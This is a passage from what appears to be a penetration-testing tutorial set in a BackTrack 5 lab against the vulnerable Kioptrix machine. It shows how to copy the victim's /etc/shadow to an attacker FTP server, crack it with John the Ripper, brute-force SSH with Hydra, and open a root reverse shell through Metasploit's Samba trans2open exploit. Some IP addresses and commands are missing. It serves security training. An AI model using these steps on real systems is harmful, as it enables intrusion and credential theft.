Understanding the True Security Posture of the Network Environment being Tested

(For more resources on Open Source, see here.)

Getting files to and from victim machines

Getting root on a remote machine can be interesting and is definitely a major step in the right direction (and depending on your scope and the purpose of the test, could be the only step necessary). If your task is not complete, then you will need to find methods of transferring data to and from your victim machines. There are several tools that will assist in this task; here are a few that may make your life easier in the long run.

Installing and starting a TFTP server on BackTrack 5

TFTP can be very handy at times. Many systems will already have a TFTP client installed and using this protocol is quick and easy.

# apt-get install atftpd

Be sure that your BackTrack machine is Internet enabled during the installation. To familiarize yourself with the atftpd server type atftpd at the command prompt without any additional input.

Starting TFTP as a standalone daemon pointing to /tmp on the standard port and bound to IP address can be accomplished by typing:

# atftpd --daemon --port 69 --bind-address /tmp

You can check to see if the daemon started correctly by invoking netstat and grepping for 69.

# netstat -anu |grep 69

If everything started correctly you should see something similar to:

udp        0      0*

Installing and confguring pure-ftpd

If your version of Backtrack does not have pure-ftpd installed it may be added by using the apt-get install pure-ftpd command. For full functionality of pure-ftpd you will need to add users and perform other minor confguration changes prior to use.

# echo /etc/pure-ftpd/pureftpd.pdb > PureDB

Adds /etc/pure-ftpd/pureftpd.pdb to the PureDB confguration fle:

# ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/50pure

Creates a symbolic link to the 50pure fle:

# groupadd -g 7777 ftpz

Adds a group to the BackTrack guest machine:

# useradd -u 7777 -s /bin/false -d /dev/null -c "pureFTP" -g ftpz Testerz

Create folders that will be used:

# mkdir /var/ftp /var/ftp/public /var/ftp/public/ftplogin

Modify the ownership:

# chown -R Testerz:ftpz /var/ftp/public/ftplogin

Adds the account to the system:

# pure-pw useradd ftplogin -u Testerz -d /var/ftp/public/ftplogin Password: password Enter it again: password

Sets up a virtual account that can be used with FTP connections:

# pure-pw mkdb

Reloads the database:

# pure-pw show ftplogin

Performs a quick lookup in the Pure-FTP database to let us know the user statistics.

Login              : ftplogin Password           : $1$/NF5jAg0$I0oRJKViA5NYs455Afelr1 UID                : 7777 (Testerz) GID                : 7777 (ftpz) Directory          : /var/ftp/public/./ Full name          :  Download bandwidth : 0 Kb (unlimited) Upload   bandwidth : 0 Kb (unlimited) Max files          : 0 (unlimited) Max size           : 0 Mb (unlimited) Allowed local  IPs : Denied  local  IPs :  Allowed client IPs :  Denied  client IPs :  Time restrictions  : 0000-0000 (unlimited) Max sim sessions   : 0 (unlimited)

Starting pure-ftpd

The following command will start pure-ftpd:

#/etc/init.d/pure-ftpd start

You will be presented with the following output:

Starting ftp server: Running: /usr/sbin/pure-ftpd -l pam -8 UTF-8 -E  -u 1000 -O clf:/var/log/pure-ftpd/transfer.log -B

This server can be tested by connecting to localhost:

# ftp

The output should be similar to the following:

Connected to 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 1 of 50 allowed. 220-Local time is now 17:02. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. Name ( ftplogin 331 User ftplogin OK. Password required Password: 230-User ftplogin has group access to:  7777       230 OK. Current directory is / Remote system type is UNIX. Using binary mode to transfer fles. ftp>

Production versus a controlled test lab environment: Consider setting up a dedicated user account and appropriate security measures on your production BackTrack instance. Make certain to provide FTP accounts with the necessary permissions to write files otherwise; expect to receive errors when making these attempts from victim machines.

(For more resources on Open Source, see here.)

Passwords: Something you know…

In this day and age one would assume that all systems use multifactor authentication. Unfortunately that is not the case. Even so-called "secured networks" still use protocols that are sending out clear text passwords, systems are using insecure encryption protocols, and more. One basic skill (basic as in chess: easy to learn, diffcult to master) that every pentester should attempt to master is the art of password cracking. We will start off with a few simple examples to solidify the concept and then move on to some of the strategies used by the very best in the feld.

Cracking the hash

Passwords are often reused by busy users and even administrators. Regardless of how important a system is on the network, once you gain access to the password hashes they should immediately be cracked and added to any dictionary fle you have in place. This could potentially save a lot of time.

First we need to pull some fles from the victim machine. Start up your Backtrack Tester 1 and Kioptrix Level 1 guest machines, run the exploit you previously compiled and pull the passwd fle down so that we can run Jack against it.

  1. Start all necessary virtual devices in your lab (BackTrack Tester 1, Kioptrix).
  2. Run ./SambaVuln_10 -b 0
  3. You are now connected as root on kioptrix.level1.
  4. Open a new terminal session and start pure-ftpd on your BackTrack guest machine.
  5. In the shell that is connected to the Kioptrix machine, use FTP to connect to your FTP server on the Backtrack machine:

    cd /etc

    Move to the /etc directory. Remember that you will not receive much feedback from the victim machine.


    You should see a directory listing of the Kioptrix /etc directory.


    Type in the user name we created to the FTP server on the Backtrack machine (ftplogin).

    Password: password

    Enter the password for the FTP server account. Wait a moment or two and type:

    put shadow

    Wait a few more moments and type:



    You should see a directory listing of the target FTP site.

  6. CTRL + Q will get you out of the Kioptrix machine.

You could have also simply performed a cat shadow and copied the screen output with your mouse. Knowing how to pull files from your target machines is very important however, especially if the files are very large.

Now that we have the shadow fle on our BackTrack machine let's see what we can do with it.

# cd /pentest/passwords/john

Once we browse to the proper directory we can launch john against our Kioptrix shadow file:

# john /var/public/shadow

John will start to attempt the brute force attempts of the MD5 passwords.

Loaded 3 password hashes with 3 different salts (FreeBSD MD5 [32/64 X2])

If you are lucky or extremely patient you will be rewarded with the unencrypted passwords for the target machine. Depending on the password complexity used combined with the speed of your system this step could take anywhere from minutes to weeks to complete. There are third-party services available that can be used to crack passwords but using these would have to be specifcally permitted within your rules of engagement as you lose control of any data sent to a third party.

Brute forcing passwords

Brute forcing is still a very viable method of gaining access to a machine. The problem with passwords is that people have to be able to recall them at will. Trying to remember 233!sdsfF_DaswsaWlsc!!&$#_ would be difficult for most and thus we end up with a short list of commonly used passwords such as ILoveKellie1!. The problem with this is that there are several methods of narrowing down the list of possible passwords, and that computers currently have as many as 8 processor cores for a home desktop.

Password cracking can be accomplished by using multiple video cards and their GPUs. This is the preferred method if the resources are available.

Although the password ILoveKellie1! would meet numerous enforced password policies, you could easily make a list of passwords that appends certain commonly used characters such as !, 1, 2, and so on. If you are clever about how you are creating your word lists, placing commonly used terms such as ILove, Iam, and so on would make the rest trivial. Modern password brute forcing techniques would tear this password up in mere moments. This makes cracking passwords faster and easier than ever. Here we will take a look at a few methods of brute forcing these passwords.

Please be aware that many of the examples used in this article are simplifed to make the concepts easier to learn. Once you understand the concepts, you will be able to use the very same techniques when performing on real life networks as well.

THC Hydra

THC Hydra makes the task of checking for weak passwords fun. It is released under the GPLv3 and is continually updated by the THC team. Updated information about this product can be found by browsing http://www.thc.org/thc-hydra/.

THC Hydra currently supports more than 40 services including FTP, MySQL, POP3, SSH2, VNC, and many more.

We will start our virtual lab and get started with using THC Hydra which is included in BackTrack 5. Let's connect to the Kioptrix machine and create an account so that we can see how Hydra does at finding the password. On the BackTrack machine load up our previously used Samba exploit:

# ./SambaVuln_10 -b 0

Once connected type the following to change the password for the harold account:

passwd Harold New password: lotsOfPasswords Retype new passwords: lotsOfPasswords

As with many tools, the quickest method of determining the syntax is to invoke the program without any additional input:

# hydra

The command syntax will be displayed in the output:

Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Hydra can be used from the command prompt, but it also has a nice GUI that can be invoked using:

# xhydra

This command will launch the GUI and we are presented with the following:

We will be using the password files included with BackTrack, but ideally you will be downloading or creating your own password files, especially if you are able to pull company-specifc information about your clients website or metadata. I highly recommend you to check out cewl (written by DigiNinja and preinstalled on Backtrack) at http://www.digininja.org/projects/cewl.php.

In order to perform a simple brute forcing attack against our Kioptrix machine we must choose the following settings:

  • Target Tab
    • Single Target: (the Kioptrix virtual machine)
    • Port: 22
    • Protocol: SSH
    • Check the following options: Be Verbose, Show Attempts
  • Passwords Tab
    • Username: Harold
    • Password: lotsOfPasswords
    • Check: Try login as password, Try empty password
  • Everything else as default

Go to the Start tab and on the bottom of the screen click on the Start button. You will be presented with the following:

Well, we managed to guess the password for an account that we already know the password for… Not very exciting, but it does let you know there are easy methods of validating if an account login is accurate or not without having to log into whichever client is necessary (checking SNMP for instance, or TFTP).

Let's add our password to a dictionary that is included with BackTrack 5. Open up a terminal session and type:

# /pentest/passwords/wordlists

This takes you to the wordlists directory.

There is a fle named darkc0de.lst in the wordlists directory that will get you started. Take a look at this fle to get an idea of what a typical wordlist will consist of.

This is a very convenient place to store all of your personal wordlists. Many testers will have several favorites, and also create wordlists on the fly as needed. Let's add our password to this listing. Edit darkc0de.lst to look something like this:

^[ ^[^[ ^[^[^[ ^[^[^[^[ ^[^[^[^[^[ ^[^[^[^[^[^[ ^[^[^[^[^[^[^[ ^[^[^[^[^[^[^[^[ !magnus !power "A" SIDES "DETROIT" GARY & CC TH WIGGINS lotsOfPasswords # #

We have added the test to the header of this password file so that it will be found faster.

Open up Xhydra again and select the following options:

  • Target Tab
    • Single Target: (the Kioptrix virtual machine)
    • Port: 22
    • Protocol: SSH
    • Check the following options: Be Verbose, Show Attempts
  • Passwords Tab
    • SUsername: Harold
    • Password List: Selected, Click the entry feld to select /pentest/ passwords/wordlists/darkc0de.lst
    • Check: Try login as password, Try empty password
  • Tuning
    • Number of Tasks: 1
    • Exit after frst found pair: Checked
  • Everything else as default

Go to the start tab again and click start in the bottom right of the window:

Hydra THC is a defnite beneft to anyone's toolkit and its use should be practiced and perfected to be truly successful in penetrating complex networks where passwords may be the weakest link in the entire security architecture.

(For more resources on Open Source, see here.)

Metasploit — learn it and love it

The Metasploit™ framework is incredible. It offers penetration testers a wide variety of tools in a friendly, easy to use manner. It was originally created by HD Moore and has recently been purchased by Rapid7, the creators of the Nexpose vulnerability scanner toolkit. Everything that we have done manually can be done with Metasploit. If you are new to penetration testing, I highly recommend that you go through the free training provided at http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training to get a really good grasp of how powerful this framework really is. This site is constantly updated and should be visited frequently to find information about the latest additions to the MSF framework.

Updating the Metasploit framework

As always, it is very important that applications are updated frequently. Metasploit is no different in this regard. You should update your installation of the Metasploit framework at least once per week. The command is very easy to remember. You can run the command from a BackTrack shell regardless of your current working directory. Be sure that your BackTrack lab machine is connected to the Internet before you update.


Once the update has completed you should be presented with an update notice and then the command prompt:

Updated to revision <new revision number> root@bt:~#

You will also see an informative section on the Metasploit title screen that reminds you of your last update:

# msfconsole

This command will yield output similar to the following:

_                                                      _ /  \  / \        __                          _   __    /_/ __ | |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \ | | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -| |_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_       |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\  =[ metasploit v4.2.0-dev [core:4.2 api:1.0] + -- --=[ 762 exploits - 404 auxiliary - 117 post + -- --=[ 228 payloads - 27 encoders - 8 nops        =[ svn r14271 updated today (2011.11.16) msf >

Note that the date of the last update and the svn number is presented as part of the output.

This may be a good time to update your BackTrack guest machine as well. You should update BackTrack before updating the Metasploit framework.

Databases and Metasploit

One of my favorite Metasploit features would be the ability to have all of your results dumped into a database. Metasploit uses PostgreSQL by default.

Installing PostgreSQL may not be required. Attempt to connect to the database within the MSF context, and if you experience errors follow the complete installation procedure and try again.

Installing PostgreSQL on BackTrack 5

We will need to reconnect our BackTrack 5 guest machine back to the Internet again in order to download and install PostgreSQL. Once you have verifed your connectivity type the following:

# apt-get install postgresql

Read the instructions and press Y to continue. The installation should finish with a statement similar to the following:

Setting up postgresql (8.4.8-0ubuntu0.10.04) ...

Now we need to make some modifcations to the installation:

# sudo su postgres -c psql could not change directory to "/root" psql (8.4.8) Type "help" for help

With postgres installed we are presented with the following prompt to let us know we are working within the database console:


We will now change the password for the default database user:

postgres=# ALTER USER postgres WITH PASSWORD 'myPassword'; ALTER ROLE

Here we changed the password for the postgre role. We will use \q to exit the postgres console.

postgres=# \q

Verifying database connectivity

Load up the Metasploit console:

# msfconsole

At the msf > prompt type:

msf> db_connect postgres:myPassword@ msf> db_status[*]    postgresql connected to pentester

Now we know that we are connected to PostgreSQL database named pentester. We can verify connectivity by typing:

msf> hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- --------

The previous command will provide us with a listing of hosts. As you can see there is nothing interesting just yet.

Performing an Nmap scan from within Metasploit

We need something exciting to display when running the hosts command so let's run a quick nmap scan to collect some data. With msfconsole open and the database connected, we can now run our nmap scans directly from within Metasploit.

msf> db_nmap -nO -sTU -pT:22,80,111,139,443,32768,U:111,137,32768

The results look very familiar with the added bonus of having been added to the database for future reference:

[*] Nmap: Starting Nmap 5.51SVN (http://nmap.org) at 2011-11-16 21:47 EST [*] Nmap: Nmap scan report for [*] Nmap: Host is up (0.00059s latency). [*] Nmap: PORT      STATE         SERVICE [*] Nmap: 22/tcp    open          ssh [*] Nmap: 80/tcp    open          http [*] Nmap: 111/tcp   open          rpcbind [*] Nmap: 139/tcp   open          netbios-ssn [*] Nmap: 443/tcp   open          https [*] Nmap: 32768/tcp open          filenet-tms [*] Nmap: 111/udp   open          rpcbind [*] Nmap: 137/udp   open          netbios-ns [*] Nmap: 32768/udp open|filtered omad [*] Nmap: MAC Address: 08:00:27:21:21:62 (Cadmus Computer Systems) [*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port [*] Nmap: Device type: general purpose [*] Nmap: Running: Linux 2.4.X [*] Nmap: OS details: Linux 2.4.9 - 2.4.18 (likely embedded) [*] Nmap: Network Distance: 1 hop [*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/. [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds

If we run a quick hosts command we will see that the system has been added to our PostgreSQL pentester database:

msf > hosts Hosts ===== address        mac                name  os_name  os_flavor  os_sp   purpose  info  comments -------        ---                ----  -------  ---------  -----  --- ----  ----  --------  08:00:27:21:21:62        Linux    2.4.X              device 

Now that the data is in the database there are all sorts of handy time saving tricks we can perform. For instance, if we would like to see which systems have port 443 open we can enter:

msf > services -p 443

This provides us with a nicely formatted output listing all systems with 443:

Services ======== host           port  proto  name   state  info ----           ----  -----  ----   -----  --- -  443   tcp    https  open 

Using auxiliary modules

msf > use auxiliary/scanner/portscan/tcp

The use command instructs Metasploit to use the specified module.

msf  auxiliary(tcp) > show options

Every module has a specifc set of options that can be displayed via the show options command. This particular module has the following options that can be changed:

Module options (auxiliary/scanner/portscan/tcp):    Name         Current Setting  Required  Description    ----         ---------------  --------  -----------    CONCURRENCY  10               yes       The number of concurrent  ports to check per host    FILTER                        no        The filter string for  capturing traffic    INTERFACE                     no        The name of the interface    PCAPFILE                      no        The name of the PCAP  capture file to process    PORTS        1-10000          yes       Ports to scan (e.g. 22- 25,80,110-900)    RHOSTS                        yes       The target address range or  CIDR identifier    SNAPLEN      65535            yes       The number of bytes to  capture    THREADS      1                yes       The number of concurrent  threads    TIMEOUT      1000             yes       The socket connect timeout  in milliseconds

We need to change a few of these to suite our needs:

msf  auxiliary(tcp) > set RHOSTS

RHOSTS is our target range. We set it to

msf  auxiliary(tcp) > set PORTS 1-1024

To save time we restrict the scan to only the first 1024 ports using the set PORTS setting.

msf  auxiliary(tcp) > run

The run command will initiate the scan using our predetermined settings. In a few moments we will receive feedback from the console:

[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

The important item of note here is that all modules operate in the same manner. Once you understand the method of searching for exploits you will be able to reuse the same steps repeatedly.

Using Metasploit to exploit Kioptrix

The time has come to take a look at using Metasploit to perform an attack against our Kioptrix machine. As we understand how to compile and use proof of concept code that is made available on the Internet we will be able to quickly appreciate the time savings that Metasploit provides. We will begin by connecting to our database.

# msfconsole msf > db_connect postgres:myPassword@

We should already have some information in our database. This can be verifed:

msf > services

This command provides us with the following output:

Services ======== host           port   proto  name         state  info ----           ----   -----  ----         -----  ----  22     tcp    ssh          open  80     tcp    http         open  111    udp    rpcbind      open  111    tcp    rpcbind      open  137    udp    netbios-ns   open  139    tcp    netbios-ssn  open  443    tcp    https        open  32768  tcp    filenet-tms  open  32768  udp    omad         open  

When reviewing these ports we find our previously exploited samba port 139 is still open. Now it is time to see what we can do without having to reformat exploit code.

msf> search samba

This results in:

  • Name: The name column will be used in correlation to the USE command once we decide which exploit we will try.
  • Disclosure: Disclosure date is the actual date that the exploit was made known to the community or the vendor, not when the proof of concept code was released.
  • Rank: Rank is very important since it indicates just how reliable the exploit is known to be.
  • Description is well… the description of the type of exploit this is.

We will be using the trans2open exploit. In msfconsole type:

msf > use exploit/linux/samba/trans2open

When more information regarding an exploit is needed we can use the info command to receive the following output:

msf  exploit(trans2open) > info        Name: Samba trans2open Overflow (Linux x86)      Module: exploit/linux/samba/trans2open     Version: 12196   Platform: Linux  Privileged: Yes     License: Metasploit Framework License (BSD)        Rank: Great Provided by:   hdm <hdm@metasploit.com>   jduck <jduck@metasploit.com> Available targets:   Id  Name   --  ----  0   Samba 2.2.x - Bruteforce Basic options:   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   RHOST                   yes       The target address   RPORT  139              yes       The target port Payload information:   Space: 1024   Avoid: 1 characters Description:   This exploits the buffer overflow found in Samba versions 2.2.0 to    2.2.8. This particular module is capable of exploiting the flaw on    x86 Linux systems that do not have the noexec stack option set.    NOTE: Some older versions of RedHat do not seem to be vulnerable    since they apparently do not allow anonymous access to IPC. References:



This information is available for all of the exploits in Metasploit. When time permits, taking the time to familiarize yourself with some of the most commonly used exploits would be very beneficial in the long term as you will be able to avoid trying exploits that do not work on production systems.

Now we need to set some of the options that are available:

msf > set RHOST

RHOST is the remote hosts and needs to be set to our Kioptrix machines IP address.

msf > show payloads

The show payloads command provides a listing of all of the compatible payloads that can be used with this particular exploit. We will make use of reverse_tcp for this example. This payload type is small and usually effective although it does not have the full range of options available that meterpreter does.

> set payload linux/x86/shell/reverse_tcp

We will also have to set the LHOST and the LPORT.

> set LHOST

This is our localhost that the listener will be set up on.

> set LPORT 2222

This is the port that we would like to listen on.

Now that is out of the way and we can move on to exploitation:

> exploit

If all goes as planned, you will receive the following confirmation:

msf  exploit(trans2open) > exploit [*] Started reverse handler on  [*] Trying return address 0xbffffdfc... [*] Trying return address 0xbffffcfc... [*] Trying return address 0xbffffbfc... [*] Trying return address 0xbffffafc... [*] Sending stage (36 bytes) to [*] Command shell session 2 opened ( -> at 2011-11-16 23:22:06 -0500

To ensure that we have root, we will perform the following commands:

# mail Mail version 8.1 6/6/93.  Type ? for help. "/var/mail/root": 6 messages 6 unread >U  1 root@kioptix.level1   Sat Sep 26 11:42  15/481   "About Level 2"  U  2 root@kioptrix.level1  Thu Nov 10 19:34  19/534   "LogWatch for  kioptrix"  U  3 root@kioptrix.level1  Fri Nov 11 14:38  48/1235  "LogWatch for  kioptrix"  U  4 root@kioptrix.level1  Sun Nov 13 15:12  19/534   "LogWatch for  kioptrix"  U  5 root@kioptrix.level1  Mon Nov 14 18:23 244/12279 "LogWatch for  kioptrix"  U  6 root@kioptrix.level1  Wed Nov 16 15:19  19/534   "LogWatch for  kioptrix

We are looking at the messages for the root account and can see that Loneferret has left us a nice little message; type 1 to read it:

# 1 Message 1: From root  Sat Sep 26 11:42:10 2009 Date: Sat, 26 Sep 2009 11:42:10 -0400 From: root <root@kioptix.level1> To: root@kioptix.level1 Subject: About Level 2 If you are reading this, you got root. Congratulations. Level 2 won't be as easy...

This last exercise should have made it clear that compared to manually finding and compiling code using Metasploit is a breeze. The best part about it is that you will be able to add your own modules and compiled code to the framework as well.


In this article we looked at password cracking and brute forcing with both John the Ripper and THC Hydra. Password cracking is not going to go away anytime soon and expertise of this subject can be very beneficial in the long term.

The article also covered the steps necessary to transfer files to and from an exploited machine; this included the set up and confguration of the FTP daemon that comes preinstalled with BackTrack 5.

Finally, we wrapped up the article with a look at Metasploit and how it can be used to simplify the task of penetration testing in many different ways. By performing hands-on exercises it quickly became clear that although manually finding and compiling exploit code can be beneficial, using Metasploit can significantly increase your overall productivity.